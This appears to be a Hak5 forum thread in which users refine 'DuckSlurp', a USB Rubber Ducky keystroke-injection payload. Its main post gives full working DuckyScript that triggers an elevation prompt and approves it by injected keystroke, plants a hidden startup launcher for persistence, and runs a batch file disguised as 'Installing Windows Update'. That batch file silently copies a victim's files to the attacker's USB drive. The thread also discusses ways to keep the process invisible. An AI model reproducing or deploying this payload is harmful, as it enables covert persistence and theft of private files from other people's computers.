Cripticlord Posted March 30, 2015 Share Posted March 30, 2015 I just had an idea that came from one of the Hak5 episodes about the Ducky, Darren mentioned something about having the DuckyWait.bat always running so you could just come by and plug in the DUCKY USB (Not the actual Ducky) and it would copy all of the files you told it to without running the Ducky everytime. From what I can see it would only take one change in the coding of DuckSlurp V2. REM *** Change directories because System32 appears to be protected. *** STRING CD %TEMP% ENTER Just change "%TEMP%" to "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" and it will create the DuckyWait.bat in the startup folder so everytime the computer is restarted, so is the DuckyWait.bat. What do you guys think? Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 21, 2015 Share Posted April 21, 2015 I suppose you could use the firmware which only runs when you tap the button, thereby only running the payload when you actually need to. You could also put an if statement in duck slurp which prevents overwriting the duck slurp payload if it already exists (I would kill for a ducky case which has a button on it so I didn't have to take it out of the case every time I wanted to tap the button). The if statement wouldn't be surreptitious though if you wanted to plug in the duck while the user was looking. Now the problem with moving a batch file to the start-up folder is that you cannot tell the batch file to run invisibly, Windows automatically runs everything in the start-up folder. what is needed is some indirection whereby the duck slurp is somewhere else, and only a small start-up command is present in the start-up folder. The "invis.vbs" call and "wscript.exe" needs included in whatever batch file is resident there. If there was only one batch file in the start-up folder then you would essentially have a black box (dos box) appear at start-up, then exit it's self or something. I would have to do some tinkering to see if this would work. The problem is you have to be very specific in order to make batch files run silently on Windows Vista/7. Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 21, 2015 Share Posted April 21, 2015 (edited) Better make it V3. The following should work. So a cmd window will pop up on reboot, but it exits almost instantly, kicking off the batch process. You could do the same thing with registry keys, and one less file, but I think this way there are less assumptions about having admin access. REM Author: overwraith modified by dkitchen REM Name: DuckSlurp_V3.txt REM Purpose: Duck Slurp payload, copy files off of the host computer. REM Encoder V2.4+ REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 REM *** Change directories because System32 appears to be protected. *** STRING CD %TEMP% ENTER REM *** Delete wait batch file if already exists *** STRING erase /Q DuckyWait.bat ENTER REM *** Make batch file that waits for SD card to mount. *** STRING copy con DuckyWait.bat ENTER STRING :while1 ENTER STRING @echo off ENTER STRING :while1 ENTER REM *** Find the DUCKY drive *** STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if [%DuckyDrive%] EQU [] ( ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING ) else ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING set DuckyDrive=%DuckyDrive%\DuckSlurp\ ENTER STRING Start %DuckyDrive%\DuckSlurp.bat ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Change directories to startup folder *** STRING cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" ENTER REM *** Delete program start if already exists *** STRING erase /Q SlurpStart.bat ENTER REM *** Make batch file that starts from the startup folder *** STRING copy con SlurpStart.bat ENTER REM *** Run the batch file invisibly *** STRING start wscript.exe %TEMP%\invis.vbs %TEMP%\DuckyWait.bat >>nul ENTER STRING exit ENTER CONTROL z ENTER REM *** Start the slurp program *** STRING SlurpStart.bat ENTER REM *** Exit *** STRING EXIT ENTER Here is the DuckSlurp.bat file which should reside on your exfil- drive. @echo off @echo Installing Windows Update set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Desktop\EvilPlans %destination% >>nul ) @cls @exit Of course you would substitute the directory path with the files you would like to copy off the computer, perhaps a loop which loops through the directories, copying certain extensions etc. PS. This version has the DuckSlurp.bat file running so that it can be seen so that you know when all the files are done copying, replace with this line " STRING Start %DuckyDrive%\DuckSlurp.bat " with this one " STRING wscript.exe %TEMP%\invis.vbs %DUCKYdrive%\DuckSlurp.bat " to make it silent again (remove outer quotes). Edited April 21, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.